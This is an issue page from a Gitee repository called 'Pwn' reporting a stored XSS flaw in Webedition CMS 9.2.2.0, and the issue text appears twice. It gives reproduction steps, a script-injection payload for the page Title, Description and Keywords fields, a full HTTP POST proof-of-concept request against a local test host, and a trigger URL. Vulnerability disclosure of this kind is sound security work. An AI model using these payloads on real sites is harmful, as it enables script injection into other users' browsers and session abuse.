登录
注册
开源
企业版
高校版
搜索
帮助中心
使用条款
关于我们
开源
企业版
高校版
私有云
模力方舟
登录
注册
代码拉取完成,页面将自动刷新
捐赠
捐赠前请先登录
取消
前往登录
扫描微信二维码支付
取消
支付完成
支付提示
将跳转至支付宝完成支付
确定
取消
Watch
不关注
关注所有动态
仅关注版本发行动态
关注但不提醒动态
1
Star
0
小呆
/
Pwn
代码
Issues
2
Pull Requests
0
Wiki
流水线
服务
质量分析
Jenkins for Gitee
腾讯云托管
腾讯云 Serverless
悬镜安全
阿里云 SAE
Codeblitz
SBOM
我知道了,不再自动展开
更新失败,请稍后重试!
移除标识
内容风险标识
本任务被
标识为内容中包含有代码安全 Bug 、隐私泄露等敏感信息,仓库外成员不可访问
Webedition CMS 9.2.2.0 has a Stored XSS vulnerability via /webEdition/we_cmd.php
待办的
#I94VFH
小呆
拥有者
创建于
2024-02-29 23:46
## Install using OnlineInstaller.php Download link: https://download.webedition.org/releases/ Runtime environment: Nginx + php8.1 Bind domain name webedition.test Access through a web browser.  After installation is complete.  ## POC The steps to reproduce are as follows. Go to New -> Webedition page -> empty page  Insert Payload into Title, Description, and Keywords, and save. XSS can be triggered by previewing on the right side. ``` "><script>alert(123)</script> ``` POC is ``` POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=6b35402e47882e87393d52aad95d344a&we_cmd[2]=0&we_cmd[3]=1&we_cmd[4]=0&we_cmd[5]=&we_cmd[6]= HTTP/1.1 Host: webedition.test Content-Length: 1691 Cache-Control: max-age=0 Origin: http://webedition.test DNT: 1 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://webedition.test/webEdition/we_cmd.php?we_cmd[0]=load_editor&we_transaction=6b35402e47882e87393d52aad95d344a&we_complete_request=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: WESESSION=065414a1ad57da84f32469df75aa9add08e00e77; treewidth_main=300; cookie=yep Connection: close we_transaction=6b35402e47882e87393d52aad95d344a&we_680c4582c389c87256890621c68ed13d_Filename=xss.php&we_680c4582c389c87256890621c68ed13d_Extension=.php&wetmp_we_680c4582c389c87256890621c68ed13d_Extension=&we_680c4582c389c87256890621c68ed13d_ParentPath=%2F&we_680c4582c389c87256890621c68ed13d_ParentID=0&yuiAcContentTypeParentPath=&we_680c4582c389c87256890621c68ed13d_DocType=&we_680c4582c389c87256890621c68ed13d_TemplateName=%2F&we_680c4582c389c87256890621c68ed13d_TemplateID=&yuiAcContentTypeTemplate=&we_680c4582c389c87256890621c68ed13d_IsDynamic=0&we_680c4582c389c87256890621c68ed13d_IsSearchable=0&we_680c4582c389c87256890621c68ed13d_InGlossar=0&we_680c4582c389c87256890621c68ed13d_txt%5BTitle%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&we_680c4582c389c87256890621c68ed13d_txt%5BDescription%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&we_680c4582c389c87256890621c68ed13d_txt%5BKeywords%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_680c4582c389c87256890621c68ed13d_Language=en_GB&we_680c4582c389c87256890621c68ed13d_LanguageDocName%5Bde_DE%5D=&we_680c4582c389c87256890621c68ed13d_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_680c4582c389c87256890621c68ed13d_LanguageDocName%5Ben_GB%5D=&we_680c4582c389c87256890621c68ed13d_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_680c4582c389c87256890621c68ed13d_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_680c4582c389c87256890621c68ed13d_CreatorID=%2Fadmin&we_680c4582c389c87256890621c68ed13d_CreatorID=1&we_680c4582c389c87256890621c68ed13d_RestrictOwners=0&we_complete_request=1 ```  as we can see adding a file now In the right click preview, XSS can be triggered.  Also trigger by accessing `http://webedition.test/webEdition/we_cmd.php?we_cmd[0]=we_base_showTemp&file=temp/tmp//webEdition/we_cmd.php?we_cmd[0]=we_base_showTemp&file=temp/tmp/b80a801e48785da90002028bf0599cd6.php`. 
## Install using OnlineInstaller.php Download link: https://download.webedition.org/releases/ Runtime environment: Nginx + php8.1 Bind domain name webedition.test Access through a web browser.  After installation is complete.  ## POC The steps to reproduce are as follows. Go to New -> Webedition page -> empty page  Insert Payload into Title, Description, and Keywords, and save. XSS can be triggered by previewing on the right side. ``` "><script>alert(123)</script> ``` POC is ``` POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=6b35402e47882e87393d52aad95d344a&we_cmd[2]=0&we_cmd[3]=1&we_cmd[4]=0&we_cmd[5]=&we_cmd[6]= HTTP/1.1 Host: webedition.test Content-Length: 1691 Cache-Control: max-age=0 Origin: http://webedition.test DNT: 1 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://webedition.test/webEdition/we_cmd.php?we_cmd[0]=load_editor&we_transaction=6b35402e47882e87393d52aad95d344a&we_complete_request=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: WESESSION=065414a1ad57da84f32469df75aa9add08e00e77; treewidth_main=300; cookie=yep Connection: close we_transaction=6b35402e47882e87393d52aad95d344a&we_680c4582c389c87256890621c68ed13d_Filename=xss.php&we_680c4582c389c87256890621c68ed13d_Extension=.php&wetmp_we_680c4582c389c87256890621c68ed13d_Extension=&we_680c4582c389c87256890621c68ed13d_ParentPath=%2F&we_680c4582c389c87256890621c68ed13d_ParentID=0&yuiAcContentTypeParentPath=&we_680c4582c389c87256890621c68ed13d_DocType=&we_680c4582c389c87256890621c68ed13d_TemplateName=%2F&we_680c4582c389c87256890621c68ed13d_TemplateID=&yuiAcContentTypeTemplate=&we_680c4582c389c87256890621c68ed13d_IsDynamic=0&we_680c4582c389c87256890621c68ed13d_IsSearchable=0&we_680c4582c389c87256890621c68ed13d_InGlossar=0&we_680c4582c389c87256890621c68ed13d_txt%5BTitle%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&we_680c4582c389c87256890621c68ed13d_txt%5BDescription%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&we_680c4582c389c87256890621c68ed13d_txt%5BKeywords%5D=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_680c4582c389c87256890621c68ed13d_Language=en_GB&we_680c4582c389c87256890621c68ed13d_LanguageDocName%5Bde_DE%5D=&we_680c4582c389c87256890621c68ed13d_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_680c4582c389c87256890621c68ed13d_LanguageDocName%5Ben_GB%5D=&we_680c4582c389c87256890621c68ed13d_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_680c4582c389c87256890621c68ed13d_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_680c4582c389c87256890621c68ed13d_CreatorID=%2Fadmin&we_680c4582c389c87256890621c68ed13d_CreatorID=1&we_680c4582c389c87256890621c68ed13d_RestrictOwners=0&we_complete_request=1 ```  as we can see adding a file now In the right click preview, XSS can be triggered.  Also trigger by accessing `http://webedition.test/webEdition/we_cmd.php?we_cmd[0]=we_base_showTemp&file=temp/tmp//webEdition/we_cmd.php?we_cmd[0]=we_base_showTemp&file=temp/tmp/b80a801e48785da90002028bf0599cd6.php`. 
评论 (
0
)
登录
后才可以发表评论
状态
待办的
待办的
进行中
已完成
已关闭
负责人
未设置
标签
未设置
标签管理
里程碑
未关联里程碑
未关联里程碑
Pull Requests
未关联
未关联
关联的 Pull Requests 被合并后可能会关闭此 issue
开始日期   -   截止日期
-
置顶选项
不置顶
置顶等级:高
置顶等级:中
置顶等级:低
优先级
不指定
严重
主要
次要
不重要
参与者(1)
1
https://gitee.com/shavchen214/pwn.git
git@gitee.com:shavchen214/pwn.git
shavchen214
pwn
Pwn
点此查找更多帮助
搜索帮助
Git 命令在线学习
如何在 Gitee 导入 GitHub 仓库
Git 仓库基础操作
企业版和社区版功能对比
SSH 公钥设置
如何处理代码冲突
仓库体积过大,如何减小?
如何找回被删除的仓库数据
Gitee 产品配额说明
GitHub仓库快速导入Gitee及同步更新
什么是 Release(发行版)
将 PHP 项目自动发布到 packagist.org
评论
仓库举报
回到顶部
登录提示
该操作需登录 Gitee 帐号,请先登录后再操作。
立即登录
没有帐号,去注册